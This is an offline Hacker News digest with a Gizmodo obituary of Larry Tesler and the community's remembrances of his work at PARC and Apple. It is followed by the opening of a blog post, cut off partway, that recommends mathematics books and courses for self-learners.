Hacker News with comments/articles inlined for offline reading

Authors ranked on leaderboard
Last updated: February 25, 2020 17:06



Front Page/ShowHN stories over 4 points from last 7 days
If your internet connection drops, you can still read the stories
If there have been any historical discussions of a story, links to all the previous submissions on Hacker News will appear just above the comments.

Historical Discussions: Larry Tesler Has Died (February 18, 2020: 1345 points)
Larry Tesler has passed away (February 19, 2020: 2 points)

(1346) Larry Tesler Has Died

1346 points 7 days ago by drallison in 1672nd position

gizmodo.com | Estimated reading time – 4 minutes | comments | anchor

The advent of the personal computer wasn't just about making these powerful machines available to everyone; it was also about making them accessible and usable, even for those lacking a computer science degree. Larry Tesler, who passed away on Monday, might not be a household name like Steve Jobs or Bill Gates, but his contributions to making computers and mobile devices easier to use are the highlight of a long career influencing modern computing.

Born in 1945 in New York, Tesler went on to study computer science at Stanford University. After graduation he dabbled in artificial intelligence research (long before it became a deeply concerning tool) and became involved in the anti-war and anti-corporate-monopoly movements, with companies like IBM among his deserving targets. In 1973 Tesler took a job at the Xerox Palo Alto Research Center (PARC), where he worked until 1980. Xerox PARC is famously known for developing the mouse-driven graphical user interface we now all take for granted, and during his time at the lab Tesler worked with Tim Mott to create a word processor called Gypsy, which is best known for coining the terms "cut," "copy," and "paste" for the commands that remove, duplicate, or reposition chunks of text.

Xerox PARC is also well known for not capitalizing on the groundbreaking research it did in personal computing, so in 1980 Tesler moved to Apple Computer, where he worked until 1997. Over the years he held countless positions at the company, including Vice President of AppleNet (Apple's in-house local area networking system, eventually canceled), and even served as Apple's Chief Scientist, a position that at one time was held by Steve Wozniak.

In addition to his contributions to some of Apple's most famous hardware, Tesler was also known for his efforts to make software and user interfaces more accessible. Beyond the now ubiquitous "cut," "copy," and "paste" terminology, Tesler was an advocate for an approach to UI design known as modeless computing, a cause reflected in the name of his personal website, nomodes.com. In essence, it ensures that user actions remain consistent throughout an operating system's various functions and apps. Open a word processor, for instance, and users now just automatically assume that hitting any of the alphanumeric keys on the keyboard will result in that character showing up on-screen at the cursor's insertion point. But there was a time when word processors could be switched between multiple modes, where typing on the keyboard would either add characters to a document or enter functional commands.

There are still plenty of software applications where tools and functionality change depending on the mode they're in (complex apps like Photoshop, for example, where various tools behave differently and perform very distinct functions) but for the most part modern operating systems like Apple's macOS and Microsoft's Windows have embraced user-friendliness through a less complicated modeless approach.

After leaving Apple in 1997, Tesler co-founded a company called Stagecast Software which developed applications that made it easier and more accessible for children to learn programming concepts. In 2001 he joined Amazon and eventually became the VP of Shopping Experience there, in 2005 he switched to Yahoo where he headed up that company's user experience and design group, and then in 2008 he became a product fellow at 23andMe. According to his CV, Tesler left 23andMe in 2009 and from then on mostly focused on consulting work.

While there are undoubtedly countless other contributions Tesler made to modern computing as part of his work on teams at Xerox and Apple that may never come to light, his known contributions are immense. Tesler is one of the major reasons computers moved out of research centers and into homes.




All Comments: [-] | anchor

alankay(10000) 5 days ago [-]

I knew Larry Tesler as a colleague, friend, member of my research group, manager, etc. for more than 50 years, almost as long as I knew Bert Sutherland.

There is an excellent obit for Larry at: https://gizmodo.com/larry-tessler-modeless-computing-advocat...

... and I expect another one from John Markoff -- who was a friend of his -- in the NYTimes.

In many ways, Larry did too many interesting things and had so much influence in too many areas for there to be any chance to characterize him technically. In short, he was a superb wide-spectrum (real) computer scientist who was also a very talented and skilled programmer.

His passing was sudden and unexpected, and I may return later to this note to add more details of his rich career.

For now, I remember him as great to work with in all aspects of his life. He was a great guy, and perhaps that sums him up as best as can be.

dang(195) 5 days ago [-]

We've put a link to that article in the title above. (This submission was originally a short text post.)

oblio(3448) 5 days ago [-]

Is anyone from PARC still involved in research these days? Or is everyone retired or just chugging along at regular corporate jobs?

ChuckMcM(537) 6 days ago [-]

Larry was a great thinker. I got to discuss 'vi vs. emacs' with him at one of the Fellows induction ceremonies held at the Computer History Museum. He could easily articulate counter cases and keep the discussion both productive and quite civil!

I first met him while I was visiting my wife at her office in Xerox Business Systems (XBS). He came over to discuss some suggestions to improve the protocol she was working on. I thought he was one of her co-workers because the discussion was very peer-to-peer as opposed to top-down. She corrected me to point out he was one of the movers and shakers at PARC. That left a very positive impression on me.

He was also 'the other Larry' at Xerox. Larry Garlick, 'Larry' to most people, was likewise at XBS (as was Eric Schmidt) and later followed Eric over to Sun.

mrandolph(10000) 6 days ago [-]

Which side of the debate was he on personally?

haeberli(10000) 6 days ago [-]

Eric Schmidt was, as I recall from when I was there, at PARC proper, doing his PhD thesis research and writing his thesis. But as Larry Tesler's interaction showed, there were fluid interactions between at least some people at PARC and the XBS and Xerox Star teams.

m0hit(3543) 5 days ago [-]

Only tangentially related but I loved reading this interview with him from Computer History Museum https://archive.computerhistory.org/resources/access/text/20...

It's not the same impact as the video interview in Designing Interactions but covers a lot of ground from Larry Tesler's perspective.

suyash(3715) 7 days ago [-]

RIP Larry Tesler. I ran into him a few times at meetup events in the Bay Area; few people knew who he was, as he kept a very low profile.

dbg31415(3949) 6 days ago [-]

I met him at a meetup I went to out in SF while traveling for work. I didn't know anyone there; I was just going to kill time. I had no idea who he was, just someone willing to chat with me for an hour or so. I started asking him what he did, and it was clear he wasn't there to talk about himself. He just struck me as a really cool, really humble, really approachable guy, with a lot of good ideas and a passion for spreading curiosity. The world needs more people like this, not fewer.

alariccole(3474) 6 days ago [-]

This breaks my heart. I used to work next to Larry—literally sat next to him—on Yahoo's central design team. We were in frequent meetings together, but didn't talk one-on-one often. One evening commuting from work, during one of many Caltrain failures, he noticed me as I waited outside the train and offered me a ride home. I remember sitting nervously in the car, a bit awestruck, and I finally got up the courage to ask him "Did you really invent copy and paste?!"

"Yes."

From then on the ice was broken and we chatted more freely: fun discussions about the (then) up-and-coming voice recognition UIs (I compared them to CLIs which he liked), wearables, design, and cycling.

I consider him a friend. Didn't expect us to lose him so soon.

jusujusu(10000) 5 days ago [-]

> he noticed me as I waited outside the train and offered me a ride home

Ctrl-X + Ctrl-V

alariccole(3474) 6 days ago [-]

To clarify, as the dialogue could be construed otherwise, Larry was actually very humble. While he was not as famous as he should have been, he had so much influence on the industry that it could easily have gone to his head. He was very approachable and helpful, and overall a generous and kind person. He will be sorely missed.

jakelazaroff(3868) 6 days ago [-]

Tangentially related question: is this why HN currently has a black bar above the navigation? To commemorate his death?

donarb(4282) 6 days ago [-]

Yes, people of significance in computing are honored this way.

penagwin(4302) 6 days ago [-]

Yes, HN does this to commemorate people who were impactful in the technology world when they die.

aresant(698) 6 days ago [-]

A career in full from his own CV:

'Board director for a FTSE 250 company, vp in three Fortune 500 corporations, president of two small software firms. 32 years building and managing teams of software and hardware engineers, designers, researchers, scientists, product managers and marketers to deliver innovative customer-centered products.'

http://www.nomodes.com/Tesler_CV_Public.pdf

musicale(10000) 6 days ago [-]

Honest but overly modest summary. I picture hiring managers or AI throwing his resumé away because he didn't have enough experience and was 'out of date.'

The Apple and Xerox segments are nothing short of astonishing.

nl(1154) 6 days ago [-]

ARM (Advanced RISC Machines) Holdings, ltd Cambridge, England (co-founder)

Championed the spinout of Advanced RISC Machines (ARM) from Acorn plc and served on ARM's board for 13 years.

That turned out fairly well....

Scobleizer(10000) 6 days ago [-]

Two tech legends left us this week: Larry Tesler and Bert Sutherland. Both played key roles at PARC, the research center Xerox started that sparked large chunks of what we use today.

Regarding Tesler: I sat next to him when I flew back from interviewing at Microsoft. He was in the last row on the plane. I saw his Blackberry, assumed he was a nerd. He had just left Apple and was on the committee that hired Steve Jobs. He had his fingers in so much of the tech that we use today, from object-oriented programming to the Newton that set the stage for the iPhone.

Sutherland participated in the creation of the personal computer, the tech of microprocessors, the Smalltalk and Java programming languages, and much more.

Huge losses for our industry.

smarky0x7CD(10000) 6 days ago [-]

Also Peter Montgomery.

Legend in cryptography who created many algorithms for fast and secure elliptic curve cryptography.

https://en.wikipedia.org/wiki/Peter_Montgomery_(mathematicia...

linguae(4295) 6 days ago [-]

I was just eating lunch across the street from Apple's headquarters in Cupertino when I read the news.

The John Sculley era of Apple has received a lot of criticism. With that being said, one of the aspects of this era that I'm most impressed with is the work that came out of Apple's Advanced Technology Group. During this time period Apple was serious about advancing the state of research in the areas of programming languages, systems software, and human-computer interaction. There were many great people who were part of this group, including Larry Tesler and Don Norman. I completely understand why Steve Jobs shut down this group in 1997; times were rough for Apple, and the company couldn't afford to do research when its core business was in dire straits. But I wish Apple had revived this group when its fortunes changed, and I also wish Apple still had the focus on usability and improving the personal computing experience that it had in the 1980s and 1990s.

timClicks(3641) 6 days ago [-]

Was Dylan created by the ATG?

buzzert(4313) 5 days ago [-]

Bagel Street Cafe?

mikelevins(10000) 6 days ago [-]

Larry was influential in the development and the missions of both ATG and the Human Interface Group, both of which are gone now. He believed in conducting practical experiments with users and collecting objective measurements of how well a UI worked. He wanted to find general principles that could be used to make all software better for everyone.

Steve Jobs killed both ATG and HIG. I think your point about times being rough and money being tight is valid, but three years earlier Steve Jobs sat in my office at NeXT and told me that if it were up to him, Apple would kill ATG and HIG--not because they were expensive, but because, in his words, they had too much influence.

Sure enough, when he took over Apple again, he wasted no time in killing them and replacing them with himself.

You're probably right that cutting those expenses was important to Apple's recovery. I think your other point is right, too, though: we'd be better off if Apple--or somebody--reconstituted something like HIG to show the industry what's possible if you take user experience and human-computer interaction seriously.

Unfortunately, Larry can't help us with it this time.

kristianp(421) 6 days ago [-]

There's one thing on his Wikipedia page which I think is probably wrong: I don't think Wirth had any involvement with Object Pascal.

jdswain(10000) 6 days ago [-]

I think he did, as a consultant. The main reference I found was an article in MacTech, written by an Apple employee:

'Object Pascal is an extension to the Pascal language that was developed at Apple in consultation with Niklaus Wirth, the inventor of Pascal.'

http://preserve.mactech.com/articles/mactech/Vol.02/02.12/Ob...

mikelevins(10000) 6 days ago [-]

I met Larry in about 1992 when I went to work on the Newton project. I had seen him around Apple before, and I knew who he was and what he was known for, but I didn't actually meet him until I joined the Newton team. I found him friendly, modest, smart, shrewd, compassionate, full of interesting knowledge and ideas, and interested in other people and their ideas.

I got to know him better when John Sculley ordered him to have the Newton team ditch its Lisp OS and write one in C++. Larry approached me and a couple of other Lisp hackers and asked us to make a fresh start with Lisp and see what we could do on Newton. We wrote an experimental OS that Matt Maclaurin named 'bauhaus'.

Larry had a sabbatical coming up right about then. He took it with us. He crammed into a conference room with three or four of us and hacked Lisp code for six weeks. He was a solid Lisp hacker. He stayed up late with us and wrote AI infrastructure for the experimental OS, then handed it off to me when he had to, as he put it, 'put his executive hat back on.' He hung around with us brainstorming and arguing about ideas. He had us out to his house for dinner.

A little later, when things were hectic and pressure was high on Newton, one of our colleagues killed himself. Larry roamed the halls stopping to talk to people about how they were doing. I was at my desk when he came by, next to another colleague that I considered a friend. Larry stopped by to check on us. My friend had also been a good friend of the fellow who had died, and he lost his composure. Larry grabbed a chair, pulled it up close and sat with him, an arm around him, patting him gently while his grief ran its course.

After Newton was released, Larry moved on to other projects. I worked on the shipped product for a while, but I was pretty burned out. Steve Jobs persuaded me to go to work for NeXT for a little while.

Steve is infamous for being, let's say, not as pleasant as Larry. In fact, he sat in my office once trashing Larry for about half an hour, for no good reason, as far as I can see. I politely disagreed with a number of his points. Larry made important contributions to the development of personal computing, and he didn't have to be a jerk to do it.

Larry was extremely smart, but I never knew him to play I'm-smarter-than-you games. I saw him encourage other people to pursue, develop, and share their ideas. I found him eager to learn new things, and more interested in what good we could do than in who got the credit for it.

We weren't close friends, except maybe when we were crammed in a conference room together for six weeks. I didn't see him much after Newton, though we exchanged the occasional friendly email over the years.

I was just thinking lately that it was about time to say hello to him again. Oops.

Larry Tesler was one of the best people I met in Silicon Valley. He was one of the best people I've met, period. I'll miss him.

Shebanator(10000) 6 days ago [-]

This is a great story, definitely made things a little dusty for me. Thanks for sharing. My own experience with him was also special - he was such an amazing kind, generous, and insightful person. And he would easily qualify for my 'ten smartest people I've ever met' list if I was the sort of person who made such lists :-)

lukego(3918) 5 days ago [-]

(I'm having trouble with this seeming to be a feel-good anecdote about a high-pressure working environment in which people are burning out and killing themselves.)

potta_coffee(4311) 5 days ago [-]

Larry sounds like the kind of guy I'd want to know. Also, I didn't know Newton was written in Lisp, that's so cool.

artsyca(4100) 6 days ago [-]

This is the sort of environment I had always envisioned growing up, dreaming of being a software professional.

I've lost some colleagues along the way too. You never know when it's going to happen, so every chance to speak should be treated with the respect of knowing it could very well be the last chance to make a connection.

wlesieutre(10000) 5 days ago [-]

Having worked on the Newton you might get a kick out of this - when I was in high school there was a guy still using one with a WiFi PCMCIA card, probably straight up to when the iPhone launched. I imagine he jumped to a smartphone eventually, but he was still on the Newton in 2006.

Seemed like a neat little device.

GuiA(469) 6 days ago [-]

A reminder that our industry is very young still, and many who laid its foundations are still with us today, but won't be forever.

There is no better time than now for collecting oral history, interviewing people, asking them about their stories, etc. All of this knowledge and these stories can get lost very, very fast.

jacquesm(45) 6 days ago [-]

And, pretty basic, but thank them for their contribution. Plenty of the stuff we take for granted should not be taken for granted at all; it took a lot of dedicated people working on severely limited machines to give us the luxuries we have today, and it's easy to believe it has always been so. It wasn't.

dmazin(3376) 6 days ago [-]

He gave us so much more than cut, copy, paste. It's clear from all the design history books that I've read that he's a legend.[1]

NO MODES!

https://itsthedatastupid.files.wordpress.com/2010/05/nomodes...

[1] One of the more rare sources for Larry Tesler's contributions is his interview for Bill Moggridge's Designing Interactions (http://www.designinginteractions.com/interviews/LarryTesler)

modeless(1461) 6 days ago [-]

The inspiration for my username.

nattaylor(4136) 6 days ago [-]

If you want to watch the interview and have trouble with flash, you can download http://www.designinginteractions.com/fla/LarryTesler.flv and then ffplay it.

MichaelMoser123(3814) 6 days ago [-]

RIP Larry Tesler

I have a .vimrc file that sets C-C/C-X/C-V to work in each mode; that gets me the best of both worlds: fast text navigation in normal mode, since I can switch to the next/previous word with w/b, but I can still copy and paste (it limits us to one buffer, though; nothing is perfect).

https://github.com/MoserMichael/myenv/blob/master/VIMENV.md

djrobstep(3824) 6 days ago [-]

Is there somewhere he elaborates on his No Modes philosophy?

Is it a blanket rule for him for all interfaces, or just text editors?

jolmg(4183) 6 days ago [-]

The Wikipedia article for Cut, Copy, and Paste[1] seems to have this bit that's cited to that book:

> Inspired by early line and character editors that broke a move or copy operation into two steps—between which the user could invoke a preparatory action such as navigation—Lawrence G. Tesler (Larry Tesler) proposed the names 'cut' and 'copy' for the first step and 'paste' for the second step. Beginning in 1974, he and colleagues at Xerox Corporation Palo Alto Research Center (PARC) implemented several text editors that used cut/copy-and-paste commands to move/copy text.

I imagine those 'early line and character editors' refers to vi's delete, yank, and put, and emacs's kill, copy/'save as if killed', and yank. I wonder what other editors had back then, before the names he came up with became standardized.

I also wonder how the idea of the operations developed before Larry Tesler contributed to it.

Looking at POSIX[2], it seems ex has delete, yank, and put, but I can't see similar functionality in standard ed (GNU's ed does have yank, but I guess it's an extension).

[1] https://en.wikipedia.org/wiki/Cut,_copy,_and_paste#Populariz...

[2] https://pubs.opengroup.org/onlinepubs/9699919799/

atdrummond(4259) 6 days ago [-]

Larry kindly traded letters with me when I was a young man attempting to learn programming via Object Pascal. Eventually, my mom made me write him a check for all the postage he had spent. In addition to sending me at least two letters a week for just around a decade, he shipped me dozens of books and manuals. One year for the holidays, someone sent me 4 large FedEx boxes filled with networking gear I desperately needed for a "M"MORPG game I was building. The return label read "53414e544120414e442048495320574f524b53484f50". In the game, players were elves scrambling to defeat a corrupted workshop. The final boss was S̶a̶t̶a̶n̶ Santa himself.

It was only when I was older that I appreciated that he had probably sent me thousands of dollars worth of gear (and not in 2020 dollars!) in addition to the invaluable advice he provided, sometimes (frankly, often) unsolicited but always direct and always thought provoking.

While I never did become an extremely competent commercial developer, to this day I enjoy programming for programming's own sake. Larry's push for me to fix my own headaches, rather than simply giving me a metaphorical aspirin, resulted in my developing solutions for small hobby problems that, it appeared, often only I and perhaps a few others shared.

As it turns out, in spite of (or thanks to) my niche interests, my curiosity and the method of targeted problem solving Larry fostered set me on a path I remain on today. Frankly, his contributions helped mold me as a man more than those of any other mentor of mine; that is absolutely meant as a compliment to his prescient pedagogy, rather than a slight at my life's many other wonderful influences.

I've sold a few businesses thanks to Larry's problem solving approach. The rest I founded are running profitably - and somehow I've never lost an investor money. My customers have always, above all else, been happy because they had their problems fixed. (Or, perhaps thanks to his influence, their happiness stemmed from my teams simply providing them with the tools they needed to solve their own problems!)

And because I followed Larry's personal advice, I have been able to spend every day for nearly two decades doing what he encouraged and what has consistently engaged me: finding, isolating and destroying problems.

Thank you for everything.

zarmin(10000) 6 days ago [-]

Great story, thanks for sharing.

zymhan(3193) 6 days ago [-]

Wow, that is quite the gesture.

Jupe(3945) 6 days ago [-]

Cute... 53414e544120414e442048495320574f524b53484f50 = SANTA AND HIS WORKSHOP
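
For anyone who wants to verify the decoding, a minimal Python sketch (the label is just ASCII text written out as pairs of hex digits):

    # Decode the return label: hex digit pairs -> ASCII characters
    label = '53414e544120414e442048495320574f524b53484f50'
    print(bytes.fromhex(label).decode('ascii'))  # prints: SANTA AND HIS WORKSHOP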

bilekas(10000) 6 days ago [-]

> doing what he encouraged

Did he encourage you to be you?

Are you you because of him? Maybe not, because it's impossible to grade.

But here you are paying respect to a man that you met, so I would say: he had an impact on you, even in that moment.

We could play high-school politics and ask what you learned from him.

But from your message it's clear.

I never met him personally, but I certainly felt his impact.

RIP

drudru11(3793) 6 days ago [-]

Great story to honor him. Maybe it is now time for you to be the 'Larry' in others' lives.

3fe9a03ccd14ca5(4316) 6 days ago [-]

Does anyone else find it strange that there's rarely any mention of cause of death in Wikipedia? Is it uncouth to ask how someone passed away?

pmcjones(10000) 5 days ago [-]

Markoff's obituary [1] in the New York Times says, 'The cause was not known, his wife, Colleen Barton, said, but in recent years he had suffered the effects of an earlier bicycle accident.'

[1] https://www.nytimes.com/2020/02/20/technology/lawrence-tesle...

Stratoscope(3182) 6 days ago [-]

Sometimes it's mentioned, sometimes the family prefers privacy. It's not uncouth to ask, but it's good to respect that privacy if the family does not share the cause of death.

alankay(10000) 4 days ago [-]

A very nice remembrance by John Markoff in the NYTimes: https://mail.yahoo.com/d/folders/1/messages/AOkUKy0vu8HQXk9u...

falcor84(3941) 7 days ago [-]

I couldn't find any corroboration of this. What happened?

jacobwilliamroy(4232) 6 days ago [-]

I think you guys dehumanize these people by reducing them to one or two sentences about computers. You haven't lost this man. You didn't even know him.

mindcrime(378) 6 days ago [-]

You don't necessarily need to know someone personally to feel a sense of loss. You can feel a 'bond' with someone based on all sorts of things: being members of a common community, sharing a common occupation, etc., etc.

To illustrate one case that hits close to home for me... when I think about the 343 firefighters who were killed on 9/11, I find it difficult not to tear up at times. Even though I never met any of them, and couldn't tell you any of their names. But we shared a common bond, by virtue of being firefighters. My sense of loss at their death is rooted in how deeply I admire all of them for the bravery and courage they displayed on that day, putting their lives on the line in the name of saving others. Do I feel that as strongly as if I had been the literal biological sibling of one of them? Possibly not, but they were still my brothers, and the sense of loss is still real.

mturmon(3929) 6 days ago [-]

Without piling on: sometimes this is how you get to know someone.

It used to be interesting to scan the obit section of newspapers, just to see the parade of characters and achievements that I had missed or not known enough of.

Shebanator(10000) 6 days ago [-]

Some of us actually did know him. I did, albeit not as well as others here, and I see no harm and much good in people celebrating his accomplishments in his chosen career.

tobr(1728) 6 days ago [-]

Larry Tesler was really convinced of the merits of modeless interfaces. He even got "NOMODES" on his license plate.

https://queeniehui.wordpress.com/2013/10/03/designing-intera...

hawflakes(10000) 6 days ago [-]

Was at 23andMe when he was there, too. We (engineering) had no idea who he was initially, but I did notice his license plate 'NO MODES.' Only after we looked him up and found that he had invented copy-paste did we realize he was a living legend. Sad to see he's passed on.





Historical Discussions: Mathematics for the Adventurous Self-Learner (February 23, 2020: 1116 points)

(1159) Mathematics for the Adventurous Self-Learner

1159 points 1 day ago by nsainsbury in 3512th position

www.neilwithdata.com | Estimated reading time – 32 minutes | comments | anchor

For over six years now, I've been studying mathematics on my own in my spare time - working my way through books, exercises, and online courses. In this post I'll share the books and resources I've worked through and recommend, along with tips for anyone who wants to go on a similar adventure.

Self-studying mathematics is hard - it's an emotional journey as much as an intellectual one and it's the kind of journey I imagine many people start but then drop off after a few months. So I also share (at the end) the practices and mindset that have for me allowed this hobby to continue through the inevitable ups and downs of life (raising two young boys, working at a startup, and moving states!)

How it all began for me

I used to love mathematics. Though I ended up getting an engineering degree and my career is in software development, I had initially wanted to study maths at university. But the reality is, that's a very tough road to take in life - the academic world is, generally speaking, a quite tortuous path with low pay and long hours, rife with burnout. So I took the more pragmatic path and as the years went by never really found the time to reconnect with math. That was until about six years ago, when I came across Robert Ghrist's online course Calculus: Single Variable (at the time I took it, it was just a Coursera course but now it's freely available on YouTube). Roughly 12 weeks and many filled notebooks later, I had reignited my interest in math and felt energized and excited.

Robert, if you read this: thanks for being such an inspiring teacher.

Why learn mathematics?

Growing up I always loved puzzles and problem solving. I would spend hours working my way through puzzle books, solving riddles, and generally latching on to anything that gives you that little dopamine hit.

If you're similar, mathematics might just be for you. Mathematics is hard. Seriously hard. And then suddenly, what was hard becomes easy, trivial, and you continue your ascent on to the next hard problem. It deeply rewards patience, persistence, and creativity and is a highly engaging activity - it's just you quietly working away, breaking down seemingly impossible problems and making them possible. I can't say enough how deeply satisfying and personally enriching it is to make the impossible possible through your own hard work and ingenuity.

One thing many people don't know as well is that the mathematics you learn at most high schools is actually quite different from what you're exposed to at the university level. The focus turns from being about rote computation to logic, deduction, and reasoning. A great quote I read once is that for most of us, when we learn mathematics at school, we learn how to play a couple of notes on a piano. But at university, we learn how to write and play music.

Picking the right books and courses for self-learning

As a self-learner, it's critical to pick books with exercises and solutions. At some point later on you can swap to books without exercises and/or solutions, but in the beginning you need that feedback to be able to learn from your mistakes and move forward when you're stuck.

The books you pick as a self-learner are also sometimes different from what you would use if you were engaged in full-time study at a university. Personally, I lean more towards books with better exposition, motivation, and examples. In a university setting, lecturers can provide that exposition and complement missing parts of books they assign for courses, but when you're on your own those missing bits can be critical to understanding.

I recommend avoiding the Kindle copies of most books and always opting for print. Very few math books have converted to digital formats well and so typically contain many formatting and display errors. Incidentally, this is often the main source for bad reviews of some excellent books on Amazon.

I'd be remiss as well if I didn't mention the publisher Dover. Dover is a well known publisher in the math community, often publishing older books at fantastically low prices. Some of the Dover books are absolutely brilliant classics - I own many and have made sure to make note of them in my recommendations below. If you don't have a big budget for learning, go for the Dover books first.

In several places I also recommend courses from MIT OpenCourseware. These courses are completely free and often have full recorded video lectures, exam papers with solutions, etc. If you like learning by video instruction and find at various points that you're getting a bit lost in a book, try looking up an appropriate course on MIT OpenCourseware and seeing if that helps get you unstuck.

Pretty much all the books I recommend below focus on undergraduate-level math, with an emphasis on pure over applied. That's just because that's the level that I'm at and also the kind of maths I like the most!

And also, just a final note that the order of books I recommend below is not exactly the order I worked through them - rather, it's the order I think they should be worked through. Sometimes I picked up a book that was too hard and had to double back and wait until I was ready. And some books have only just come out recently as well (eg. Ivan Savov's 'No BS' books) so weren't available to me when I was at that stage of learning. In short, you get to benefit from my hindsight and missteps along the way.

Alright, let's jump in to the recommendations!

Foundations

I'm going to assume a high-school level of maths is where you last left off and that it's been some time since you've last done any maths. To get going, there's a couple of books I recommend:

The Art of Problem Solving, Vol 1 & 2 (with solutions manuals) - Lehoczky and Rusczyk

The Art of Problem Solving books are wonderful starter books. They're oriented heavily towards exercises and problem solving and are fantastic books to get you off to a start actually doing maths and also doing it in a way that's not just repetitive and boring. Depending on your level of mathematical maturity, you may only want to work through volume 1 and come back to volume 2 after you've worked through a proofs book first though (the second volume has many more questions involving writing proofs which you may not yet be comfortable enough to do at this stage). Volume 2 has many excellent exercises though, so don't skip it!

No bullshit guide to math and physics - Savov

If your calculus is a little rusty or you never really understood it in high-school, I recommend working through this book. It's compact, free of long-winded explanations, and contains lots of exercises (with solutions). This book teaches calculus in a contextually motivated way by teaching it alongside mechanics, which is how I think calculus should always be taught initially (I almost recommended Kline's Calculus: An Intuitive and Physical Approach here instead, as a book I also very much like, but Kline's book is just so thick and verbose. If you do like that additional exposition, you may want to consider this book as an alternative).

Also, of course I must mention the course that started it all for me, Calculus: Single Variable. It appears Coursera has now broken the course up into several parts and as I mentioned you can also find the full lessons on YouTube. Work through either this or Savov's book - depending on whether you prefer learning from books or online courses.

A historical (and motivated) perspective

I think it's useful early on in the learning journey to have a broad map of where math has been, what has motivated its development to date, and also where it's going.

Mathematics for the Nonmathematician (Dover) - Kline

For a historical view, I highly recommend reading through Kline's Mathematics for the Nonmathematician. It contains a small handful of exercises, but they're not the main focus - this is one of the few math books I recommend that you can just leisurely read.

Concepts of Modern Mathematics (Dover) - Stewart

While Kline provides the historical perspective, Stewart will provide you with the modern perspective. This is one of the first math books I read that genuinely made me excited and deeply want to understand topology - up until then, I was only somewhat dimly aware of the subject and thought it was a bit silly. Like the Kline book, this book also has no exercises - but for me it was a springboard and motivator to open other related books and dig in and do some hands-on math.

Mathematics and Its History - Stillwell

I consider Mathematics and Its History to be somewhat optional at this point, but I want to mention it because it's so darn good. If you read through Kline's and Stewart's books and thought 'You know what, these ideas are really nice but I'd love to go more hands-on with them with some exercises' then this book is for you. Want to try to do some gentle introductory exercises from fields like noneuclidean geometry, group theory, and topology, not just idly read about them? This book might be for you.

BBC's A Brief History of Mathematics (Podcast) - du Sautoy

If you prefer listening over reading, I recommend listening to the 10-part podcast A Brief History of Mathematics that focuses on the interesting lives and personalities of some of the driving historical forces in mathematics (Galois, Gauss, Cantor, Ramanujan, etc.).

Proofs and mathematical logic

For many, your first proof book is where everything clicks and you begin to understand that there is more to math than just calculation. For this reason, many people have very strong feelings about their favourite proofs book and there are indeed several that are quite good. But my favourite of all of them is:

An Introduction to Mathematical Reasoning - Eccles

I think what I love most about An Introduction to Mathematical Reasoning is how it successfully pairs explanation with exercises, which is a recurring theme in books that I tend to gravitate to. Good exercises are an extension of the teaching journey - they tell their own story and have progression and meaning. And at the time I worked through this book, the difficulty was just right. A good chunk of the book is occupied with applying the proof techniques you learn to different domains like set theory, combinatorics, and number theory, which is also something that personally resonated with me.

Book of Proof - Hammack

Book of Proof is a nice little proofs book. It's not too long and has a good number of exercises. If you're looking for a gentler introduction to proofs this is the one to go for. For the edition I used, it contained solutions for every second problem with full solutions available on the author's personal website, which I believe is still the case today.

Calculus/Real Analysis

Calculus - Spivak

Spivak's Calculus is among the best maths books I have ever worked through, but don't be fooled by the name - this is an introductory book to real analysis and is very different from the Calculus books mentioned earlier, which emphasize computation. The emphasis of this book is on building up the foundations step by step for single variable calculus (starting from the construction of real numbers). It is a wonderfully coherent and realized book and what's also great about it is, once again, the exercises complement and expand on the content so well. Speaking of the exercises, some are seriously hard. This book took me about 6 months to work through because at the time I was still committed to solving every single exercise on my own. I almost burned out, and I discuss what I learned from that experience coming up.

Everybody should own this book.

Calculus - Apostol

Spivak's book can be genuinely too hard for some people at this stage. For that reason, there are two other books I'm happy to recommend as alternatives.

The first is Apostol's Calculus. Apostol proceeds at a more leisurely pace compared to Spivak, and is happy to spend time building up your intuition with examples and geometric arguments before diving in to more rigorous proofs. Interestingly enough, the book also goes a fairly long way in introducing linear algebra in the final few chapters. I do like as well that this book introduces integration before differentiation, which, as you'll know if you read through Kline's historical book, is more historically accurate.

One thing to note is this book can be quite hard to find and unfortunately the edition I have has some weird print quality issues. Your mileage may vary.

Introduction to Analysis - Mattuck

The second introductory analysis book I'm happy to recommend is Mattuck's Introduction to Analysis. As with Spivak, this book mostly focuses on real-valued functions of a single variable and only in the last few chapters goes beyond. Mattuck makes clear in the introduction that this book was written for those struggling with analysis and less confident with proof techniques and I think it succeeds really well in what it set out to do. If you're struggling with Spivak, pick this book up.

Linear Algebra

For Linear Algebra, I can suggest two different learning paths. If you prefer to work through books only, I recommend working through Savov and Axler for both the applied and pure views of linear algebra. However, if you're comfortable with video instruction, I really like Gilbert Strang's Linear Algebra material (both the book and the online course).

Starting with Savov and Axler:

No bullshit guide to linear algebra - Savov

No bullshit guide to linear algebra is a book that has only come out quite recently, and it's a book I read only after already making my way through more advanced texts. That necessarily changes your perspective, but nonetheless I still think this is an excellent book for a first introduction to linear algebra. One quality of the book I really appreciated was the healthy coverage of applications in the final few chapters - looking at the application of linear algebra to problems in cryptography, Fourier analysis, probability, etc.

Linear Algebra Done Right - Axler

Linear Algebra Done Right is a quite well known book, famous for its non-standard treatment of determinants, only really introducing them towards the end of the book. Incidentally, this is what the 'Done Right' in the title refers to: Axler has a bone to pick with determinants and doesn't hide it. It's a pure-math proofs focused book with nothing in the way of applications, which is also why I suggest pairing this book with Savov's which is more applied/computational. The proofs in the book are excellent and are a model for clarity and simplicity - working through this book really helped me build up a strong foundational intuition for linear algebra. The book unfortunately does not come with solutions to the exercises, but many can be found online.

Introduction to Linear Algebra and MIT OCW Linear Algebra - Strang

Here I treat both the book and the course as one, because they complement each other so well. What that does mean however is that you'll often find yourself jumping back and forwards between the book and the videos - for some people that's going to be a plus and enhance the learning experience (in many ways, it's much like it would be if you attended MIT in person) while for others that's a big detracting point. I'll leave it for you to decide which is best for you. In terms of the material, the focus is mostly on the applied side of things but still managing to touch on the theory in places. The exercises are quite good, plus you also get access to the MIT exams (with solutions).

Coding the Matrix: Linear Algebra through Applications to Computer Science - Klein

If you're a software developer like me, I wholeheartedly recommend that you pick up Coding the Matrix. I originally learned about this book through a course on Coursera but never took the online course and instead went straight for the book. The emphasis of the book is on programming (with Python), applying techniques from linear algebra to applied problems such as compression, image manipulation, machine learning, etc. It's the kind of book that I think works best if you've already had some introduction to linear algebra by working through any of the above recommended books, giving your theoretical foundations a really strong applied grounding.
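
To give a flavor of that approach, here's a tiny sketch of my own (not from the book) in Python with numpy, applying a rotation matrix to a set of 2D points - the kind of geometric application the book develops at much greater depth:

    import numpy as np

    # Rotate 2D points 45 degrees by multiplying with a rotation matrix.
    theta = np.pi / 4
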